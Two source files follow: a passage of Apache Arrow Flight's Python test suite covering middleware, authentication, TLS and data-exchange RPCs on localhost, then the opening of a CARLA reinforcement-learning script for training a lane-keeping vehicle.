def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
class HeaderServerMiddleware(ServerMiddleware):
"""Expose a per-call value to the RPC method body."""
def __init__(self, special_value):
self.special_value = special_value
class HeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Expose a per-call hard-coded value to the RPC method body."""
def start_call(self, info, headers):
return HeaderServerMiddleware("right value")
class HeaderFlightServer(FlightServerBase):
"""Echo back the per-call hard-coded value."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
if middleware:
return [middleware.special_value.encode()]
return [b""]
class MultiHeaderFlightServer(FlightServerBase):
"""Test sending/receiving multiple (binary-valued) headers."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
headers = repr(middleware.client_headers).encode("utf-8")
return [headers]
class SelectiveAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Deny access to certain methods based on a header."""
def start_call(self, info, headers):
if info.method == flight.FlightMethod.LIST_ACTIONS:
# No auth needed
return
token = headers.get("x-auth-token")
if not token:
raise flight.FlightUnauthenticatedError("No token")
token = token[0]
if token != "password":
raise flight.FlightUnauthenticatedError("Invalid token")
return HeaderServerMiddleware(token)
class SelectiveAuthClientMiddlewareFactory(ClientMiddlewareFactory):
def start_call(self, info):
return SelectiveAuthClientMiddleware()
class SelectiveAuthClientMiddleware(ClientMiddleware):
def sending_headers(self):
return {
"x-auth-token": "password",
}
class RecordingServerMiddlewareFactory(ServerMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info, headers):
self.methods.append(info.method)
return None
class RecordingClientMiddlewareFactory(ClientMiddlewareFactory):
"""Record what methods were called."""
def __init__(self):
super().__init__()
self.methods = []
def start_call(self, info):
self.methods.append(info.method)
return None
class MultiHeaderClientMiddlewareFactory(ClientMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self):
# Read in test_middleware_multi_header below.
# The middleware instance will update this value.
self.last_headers = {}
def start_call(self, info):
return MultiHeaderClientMiddleware(self)
class MultiHeaderClientMiddleware(ClientMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
EXPECTED = {
"x-text": ["foo", "bar"],
"x-binary-bin": [b"\x00", b"\x01"],
}
def __init__(self, factory):
self.factory = factory
def sending_headers(self):
return self.EXPECTED
def received_headers(self, headers):
# Let the test code know what the last set of headers we
# received were.
self.factory.last_headers = headers
class MultiHeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Test sending/receiving multiple (binary-valued) headers."""
def start_call(self, info, headers):
return MultiHeaderServerMiddleware(headers)
class MultiHeaderServerMiddleware(ServerMiddleware):
"""Test sending/receiving multiple (binary-valued) headers."""
def __init__(self, client_headers):
self.client_headers = client_headers
def sending_headers(self):
return MultiHeaderClientMiddleware.EXPECTED
def test_flight_server_location_argument():
locations = [
None,
'grpc://localhost:0',
('localhost', find_free_port()),
]
for location in locations:
with FlightServerBase(location) as server:
assert isinstance(server, FlightServerBase)
def test_server_exit_reraises_exception():
with pytest.raises(ValueError):
with FlightServerBase():
raise ValueError()
@pytest.mark.slow
def test_client_wait_for_available():
location = ('localhost', find_free_port())
server = None
def serve():
        nonlocal server
time.sleep(0.5)
server = FlightServerBase(location)
server.serve()
client = FlightClient(location)
thread = threading.Thread(target=serve, daemon=True)
thread.start()
started = time.time()
client.wait_for_available(timeout=5)
elapsed = time.time() - started
assert elapsed >= 0.5
def test_flight_list_flights():
"""Try a simple list_flights call."""
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
assert list(client.list_flights()) == []
flights = client.list_flights(ConstantFlightServer.CRITERIA)
assert len(list(flights)) == 1
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ConstantFlightServer(options=options) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
with pytest.raises(flight.FlightServerError,
match="expected IpcWriteOptions, got <class 'int'>"):
with ConstantFlightServer(options=42) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.pandas
def test_do_get_ints_pandas():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_pandas()
assert list(data['some_ints']) == table.column(0).to_pylist()
def test_flight_do_get_dicts():
table = simple_dicts_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
def test_flight_do_get_ticket():
"""Make sure Tickets get passed to the server."""
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
with CheckTicketFlightServer(expected_ticket=b'the-ticket') as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'the-ticket')).read_all()
assert data.equals(table)
def test_flight_get_info():
"""Make sure FlightEndpoint accepts string and object URIs."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_flight_info(flight.FlightDescriptor.for_command(b''))
assert info.total_records == -1
assert info.total_bytes == -1
assert info.schema == pa.schema([('a', pa.int32())])
assert len(info.endpoints) == 2
assert len(info.endpoints[0].locations) == 1
assert info.endpoints[0].locations[0] == flight.Location('grpc://test')
assert info.endpoints[1].locations[0] == \
flight.Location.for_grpc_tcp('localhost', 5005)
def test_flight_get_schema():
"""Make sure GetSchema returns correct schema."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_schema(flight.FlightDescriptor.for_command(b''))
assert info.schema == pa.schema([('a', pa.int32())])
def test_list_actions():
"""Make sure the return type of ListActions is validated."""
# ARROW-6392
with ListActionsErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(
flight.FlightServerError,
match=("Results of list_actions must be "
"ActionType or tuple")
):
list(client.list_actions())
with ListActionsFlightServer() as server:
client = FlightClient(('localhost', server.port))
assert list(client.list_actions()) == \
ListActionsFlightServer.expected_actions()
class ConvenienceServer(FlightServerBase):
"""
Server for testing various implementation conveniences (auto-boxing, etc.)
"""
@property
def simple_action_results(self):
return [b'foo', b'bar', b'baz']
def do_action(self, context, action):
if action.type == 'simple-action':
return self.simple_action_results
elif action.type == 'echo':
return [action.body]
elif action.type == 'bad-action':
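            # Intentionally return a str instead of bytes so the server-side
            # conversion fails; test_nicer_server_exceptions checks that the
            # resulting error message reaches the client.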
return ['foo']
elif action.type == 'arrow-exception':
raise pa.ArrowMemoryError()
def test_do_action_result_convenience():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
# do_action as action type without body
results = [x.body for x in client.do_action('simple-action')]
assert results == server.simple_action_results
# do_action with tuple of type and body
body = b'the-body'
results = [x.body for x in client.do_action(('echo', body))]
assert results == [body]
def test_nicer_server_exceptions():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightServerError,
match="a bytes-like object is required"):
list(client.do_action('bad-action'))
# While Flight/C++ sends across the original status code, it
# doesn't get mapped to the equivalent code here, since we
# want to be able to distinguish between client- and server-
# side errors.
with pytest.raises(flight.FlightServerError,
match="ArrowMemoryError"):
list(client.do_action('arrow-exception'))
def test_get_port():
"""Make sure port() works."""
server = GetInfoFlightServer("grpc://localhost:0")
try:
assert server.port > 0
finally:
server.shutdown()
@pytest.mark.skipif(os.name == 'nt',
reason="Unix sockets can't be tested on Windows")
def test_flight_domain_socket():
"""Try a simple do_get call over a Unix domain socket."""
with tempfile.NamedTemporaryFile() as sock:
sock.close()
location = flight.Location.for_grpc_unix(sock.name)
with ConstantFlightServer(location=location):
client = FlightClient(location)
reader = client.do_get(flight.Ticket(b'ints'))
table = simple_ints_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
reader = client.do_get(flight.Ticket(b'dicts'))
table = simple_dicts_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with EchoFlightServer(expected_schema=data.schema) as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with EchoStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with InvalidStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightTimedOutError):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
options = flight.FlightCallOptions(timeout=5.0)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
@pytest.mark.slow
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*unauthenticated.*"):
list(client.do_action(action))
@pytest.mark.skipif(os.name == 'nt',
reason="ARROW-10013: gRPC on Windows corrupts peer()")
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
results = client.do_action(action)
identity = next(results)
assert identity.body.to_pybytes() == b'test'
peer_address = next(results)
assert peer_address.body.to_pybytes() != b''
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*wrong password.*"):
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
def test_location_invalid():
"""Test constructing invalid URIs."""
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
flight.connect("%")
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
ConstantFlightServer("%")
def test_location_unknown_scheme():
"""Test creating locations for unknown schemes."""
assert flight.Location("s3://foo").uri == b"s3://foo"
assert flight.Location("https://example.com/bar.parquet").uri == \
b"https://example.com/bar.parquet"
@pytest.mark.slow
@pytest.mark.requires_testing_data
def test_tls_fails():
"""Make sure clients cannot connect when cert verification fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Ensure client doesn't connect when certificate verification
# fails (this is a slow test since gRPC does retry a few times)
client = FlightClient("grpc+tls://localhost:" + str(s.port))
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.requires_testing_data
def test_tls_do_get():
"""Try a simple do_get call over TLS."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = FlightClient(('localhost', s.port),
tls_root_certs=certs["root_cert"])
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_disable_server_verification():
"""Try a simple do_get call over TLS with server verification disabled."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
try:
client = FlightClient(('localhost', s.port),
disable_server_verification=True)
except NotImplementedError:
pytest.skip('disable_server_verification feature is not available')
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_override_hostname():
"""Check that incorrectly overriding the hostname fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
override_hostname="fakehostname")
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
def test_flight_do_get_metadata():
"""Try a simple do_get call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
batches = []
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
idx = 0
while True:
try:
batch, metadata = reader.read_chunk()
batches.append(batch)
server_idx, = struct.unpack('<i', metadata.to_pybytes())
assert idx == server_idx
idx += 1
except StopIteration:
break
data = pa.Table.from_batches(batches)
assert data.equals(table)
def test_flight_do_get_metadata_v4():
"""Try a simple do_get call with V4 metadata version."""
table = pa.Table.from_arrays(
[pa.array([-10, -5, 0, 5, 10])], names=['a'])
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with MetadataFlightServer(options=options) as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
data = reader.read_all()
assert data.equals(table)
def test_flight_do_put_metadata():
"""Try a simple do_put call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
with writer:
for idx, batch in enumerate(table.to_batches(max_chunksize=1)):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
buf = metadata_reader.read()
assert buf is not None
server_idx, = struct.unpack('<i', buf.to_pybytes())
assert idx == server_idx
def test_flight_do_put_limit():
"""Try a simple do_put call with a size limit."""
large_batch = pa.RecordBatch.from_arrays([
        pa.array(np.ones(768, dtype=np.int64)),
], names=['a'])
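    # 768 int64 values are ~6 KiB of data, which exceeds the 4 KiB soft write
    # limit configured below; each 384-row half fits under the limit.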
with EchoFlightServer() as server:
client = FlightClient(('localhost', server.port),
write_size_limit_bytes=4096)
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
large_batch.schema)
with writer:
with pytest.raises(flight.FlightWriteSizeExceededError,
match="exceeded soft limit") as excinfo:
writer.write_batch(large_batch)
assert excinfo.value.limit == 4096
smaller_batches = [
large_batch.slice(0, 384),
large_batch.slice(384),
]
for batch in smaller_batches:
writer.write_batch(batch)
expected = pa.Table.from_batches([large_batch])
actual = client.do_get(flight.Ticket(b'')).read_all()
assert expected == actual
@pytest.mark.slow
def test_cancel_do_get():
"""Test canceling a DoGet operation on the client side."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
reader.cancel()
with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"):
reader.read_chunk()
@pytest.mark.slow
def test_cancel_do_get_threaded():
"""Test canceling a DoGet operation from another thread."""
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
read_first_message = threading.Event()
stream_canceled = threading.Event()
result_lock = threading.Lock()
raised_proper_exception = threading.Event()
def block_read():
reader.read_chunk()
read_first_message.set()
stream_canceled.wait(timeout=5)
try:
reader.read_chunk()
except flight.FlightCancelledError:
with result_lock:
raised_proper_exception.set()
thread = threading.Thread(target=block_read, daemon=True)
thread.start()
read_first_message.wait(timeout=5)
reader.cancel()
stream_canceled.set()
thread.join(timeout=1)
with result_lock:
assert raised_proper_exception.is_set()
def test_roundtrip_types():
"""Make sure serializable types round-trip."""
ticket = flight.Ticket("foo")
assert ticket == flight.Ticket.deserialize(ticket.serialize())
desc = flight.FlightDescriptor.for_command("test")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
info = flight.FlightInfo(
pa.schema([('a', pa.int32())]),
desc,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
info2 = flight.FlightInfo.deserialize(info.serialize())
assert info.schema == info2.schema
assert info.descriptor == info2.descriptor
assert info.total_bytes == info2.total_bytes
assert info.total_records == info2.total_records
assert info.endpoints == info2.endpoints
def test_roundtrip_errors():
"""Ensure that Flight errors propagate from server to client."""
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.do_action(flight.Action("internal", b"")))
with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"):
list(client.do_action(flight.Action("timedout", b"")))
with pytest.raises(flight.FlightCancelledError, match=".*foo.*"):
list(client.do_action(flight.Action("cancel", b"")))
with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthenticated", b"")))
with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthorized", b"")))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.list_flights())
def test_do_put_independent_read_write():
"""Ensure that separate threads can read/write on a DoPut."""
# ARROW-6063: previously this would cause gRPC to abort when the
# writer was closed (due to simultaneous reads), or would hang
# forever.
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
count = [0]
def _reader_thread():
while metadata_reader.read() is not None:
count[0] += 1
thread = threading.Thread(target=_reader_thread)
thread.start()
batches = table.to_batches(max_chunksize=1)
with writer:
for idx, batch in enumerate(batches):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
# Causes the server to stop writing and end the call
writer.done_writing()
# Thus reader thread will break out of loop
thread.join()
# writer.close() won't segfault since reader thread has
# stopped
assert count[0] == len(batches)
def test_server_middleware_same_thread():
"""Ensure that server middleware run on the same thread as the RPC."""
with HeaderFlightServer(middleware={
"test": HeaderServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
results = list(client.do_action(flight.Action(b"test", b"")))
assert len(results) == 1
value = results[0].body.to_pybytes()
assert b"right value" == value
def test_middleware_reject():
"""Test rejecting an RPC with server middleware."""
with HeaderFlightServer(middleware={
"test": SelectiveAuthServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
# The middleware allows this through without auth.
with pytest.raises(pa.ArrowNotImplementedError):
list(client.list_actions())
# But not anything else.
with pytest.raises(flight.FlightUnauthenticatedError):
list(client.do_action(flight.Action(b"", b"")))
client = FlightClient(
('localhost', server.port),
middleware=[SelectiveAuthClientMiddlewareFactory()]
)
response = next(client.do_action(flight.Action(b"", b"")))
assert b"password" == response.body.to_pybytes()
def test_middleware_mapping():
"""Test that middleware records methods correctly."""
server_middleware = RecordingServerMiddlewareFactory()
client_middleware = RecordingClientMiddlewareFactory()
with FlightServerBase(middleware={"test": server_middleware}) as server:
client = FlightClient(
('localhost', server.port),
middleware=[client_middleware]
)
descriptor = flight.FlightDescriptor.for_command(b"")
with pytest.raises(NotImplementedError):
list(client.list_flights())
with pytest.raises(NotImplementedError):
client.get_flight_info(descriptor)
with pytest.raises(NotImplementedError):
client.get_schema(descriptor)
with pytest.raises(NotImplementedError):
client.do_get(flight.Ticket(b""))
with pytest.raises(NotImplementedError):
writer, _ = client.do_put(descriptor, pa.schema([]))
writer.close()
with pytest.raises(NotImplementedError):
list(client.do_action(flight.Action(b"", b"")))
with pytest.raises(NotImplementedError):
list(client.list_actions())
with pytest.raises(NotImplementedError):
writer, _ = client.do_exchange(descriptor)
writer.close()
expected = [
flight.FlightMethod.LIST_FLIGHTS,
flight.FlightMethod.GET_FLIGHT_INFO,
flight.FlightMethod.GET_SCHEMA,
flight.FlightMethod.DO_GET,
flight.FlightMethod.DO_PUT,
flight.FlightMethod.DO_ACTION,
flight.FlightMethod.LIST_ACTIONS,
flight.FlightMethod.DO_EXCHANGE,
]
assert server_middleware.methods == expected
assert client_middleware.methods == expected
def test_extra_info():
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
try:
list(client.do_action(flight.Action("protobuf", b"")))
assert False
except flight.FlightUnauthorizedError as e:
assert e.extra_info is not None
ei = e.extra_info
assert ei == b'this is an error message'
@pytest.mark.requires_testing_data
def test_mtls():
"""Test mutual TLS (mTLS) with gRPC."""
certs = example_tls_certs()
table = simple_ints_table()
with ConstantFlightServer(
tls_certificates=[certs["certificates"][0]],
verify_client=True,
root_certificates=certs["root_cert"]) as s:
client = FlightClient(
('localhost', s.port),
tls_root_certs=certs["root_cert"],
cert_chain=certs["certificates"][0].cert,
private_key=certs["certificates"][0].key)
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
def test_doexchange_get():
"""Emulate DoGet with DoExchange."""
expected = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"get")
writer, reader = client.do_exchange(descriptor)
with writer:
table = reader.read_all()
assert expected == table
def test_doexchange_put():
"""Emulate DoPut with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"put")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
writer.done_writing()
chunk = reader.read_chunk()
assert chunk.data is None
expected_buf = str(len(batches)).encode("utf-8")
assert chunk.app_metadata == expected_buf
def test_doexchange_echo():
"""Try a DoExchange echo server."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Read/write metadata before starting data.
for i in range(10):
buf = str(i).encode("utf-8")
writer.write_metadata(buf)
chunk = reader.read_chunk()
assert chunk.data is None
assert chunk.app_metadata == buf
# Now write data without metadata.
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
# And write data with metadata.
for i, batch in enumerate(batches):
buf = str(i).encode("utf-8")
writer.write_with_metadata(batch, buf)
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata == buf
def test_doexchange_echo_v4():
"""Try a DoExchange echo server using the V4 metadata version."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ExchangeFlightServer(options=options) as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Now write data without metadata.
writer.begin(data.schema, options=options)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
def test_doexchange_transform():
"""Transform a table with a service."""
data = pa.Table.from_arrays([
pa.array(range(0, 1024)),
pa.array(range(1, 1025)),
pa.array(range(2, 1026)),
], names=["a", "b", "c"])
expected = pa.Table.from_arrays([
pa.array(range(3, 1024 * 3 + 3, 3)),
], names=["sum"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"transform")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
writer.write_table(data)
writer.done_writing()
table = reader.read_all()
assert expected == table
def test_middleware_multi_header():
"""Test sending/receiving multiple (binary-valued) headers."""
with MultiHeaderFlightServer(middleware={
"test": MultiHeaderServerMiddlewareFactory(),
}) as server:
headers = MultiHeaderClientMiddlewareFactory()
client = FlightClient(('localhost', server.port), middleware=[headers])
response = next(client.do_action(flight.Action(b"", b"")))
# The server echoes the headers it got back to us.
raw_headers = response.body.to_pybytes().decode("utf-8")
client_headers = ast.literal_eval(raw_headers)
# Don't directly compare; gRPC may add headers like User-Agent.
for header, values in MultiHeaderClientMiddleware.EXPECTED.items():
assert client_headers.get(header) == values
assert headers.last_headers.get(header) == values
@pytest.mark.requires_testing_data
def test_generic_options():
"""Test setting generic client options."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Try setting a string argument that will make requests fail
options = [("grpc.ssl_target_name_override", "fakehostname")]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
# Try setting an int argument that will make requests fail
options = [("grpc.max_receive_message_length", 32)]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(pa.ArrowInvalid):
client.do_get(flight.Ticket(b'ints'))
|
ddpg_train_2.py
|
"""
Copyright (c) College of Mechatronics and Control Engineering, Shenzhen University.
All rights reserved.
Description :
this script would teach the vehicle how to keep lane
Author:Team Li
"""
import sys, os, glob, threading, math, time
import numpy as np
import tensorflow as tf
import cv2
import keep_lane.basic_net.ddpg_utils as ddpg
import RL.rl_utils as rl_tools
try:
    sys.path.append(r'F:\my_project\driving-desicion-in-carla\dist/carla-0.9.4-py3.7-win-amd64.egg')
    import carla
except ImportError:
    raise ImportError('Please check your carla egg file')
from carla_utils.world_ops import *
from carla_utils.sensor_ops import *
tf.app.flags.DEFINE_string(
'checkpoint_dir', '',
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'imitator_checkpoint_dir', '',
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'train_dir', '../checkpoint/',
'Directory where checkpoints are written to.')
tf.app.flags.DEFINE_integer(
'batch_size', 20, 'The number of samples in each batch.')
tf.app.flags.DEFINE_float('critic_learning_rate', 1e-1, 'Initial learning rate.')
tf.app.flags.DEFINE_float('actor_learning_rate', 1e-1, 'Initial learning rate.')
tf.app.flags.DEFINE_integer(
'img_height', 416,
'raw image height')
tf.app.flags.DEFINE_integer(
'img_width', 626,
'raw image width')
tf.app.flags.DEFINE_integer(
'log_every_n_steps', 20,
'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
'f_save_step', 2000,
'The frequency with which summaries are saved, in step.')
tf.app.flags.DEFINE_integer(
'n_egopilots', 1,
'the number of egopilots')
FLAGS = tf.app.flags.FLAGS
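# A hypothetical invocation of this script (flag values below are only examples; each
# tf.app.flags.DEFINE_* above becomes a --flag command-line option):
#   python ddpg_train_2.py --checkpoint_dir=../checkpoint/ --imitator_checkpoint_dir=../imitator/ \
#       --train_dir=../checkpoint/ --n_egopilots=1 --critic_learning_rate=1e-3 --actor_learning_rate=1e-4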
## carla config ##
semantic_camera_config = {'data_type': 'sensor.camera.semantic_segmentation', 'image_size_x': FLAGS.img_width,
'image_size_y': FLAGS.img_height, 'fov': 110, 'sensor_tick': 0.02,
'transform': carla.Transform(carla.Location(x=0.5, z=1.6)),
'attach_to':None}
bgr_camera_config = {'data_type': 'sensor.camera.rgb', 'image_size_x': FLAGS.img_width,
'image_size_y': FLAGS.img_height, 'fov': 110, 'sensor_tick': 0.02,
'transform': carla.Transform(carla.Location(x=-4, z=3)),
'attach_to':None}
collision_sensor_config = {'data_type': 'sensor.other.collision','attach_to': None}
invasion_sensor_config = {'data_type': 'sensor.other.lane_detector', 'attach_to': None}
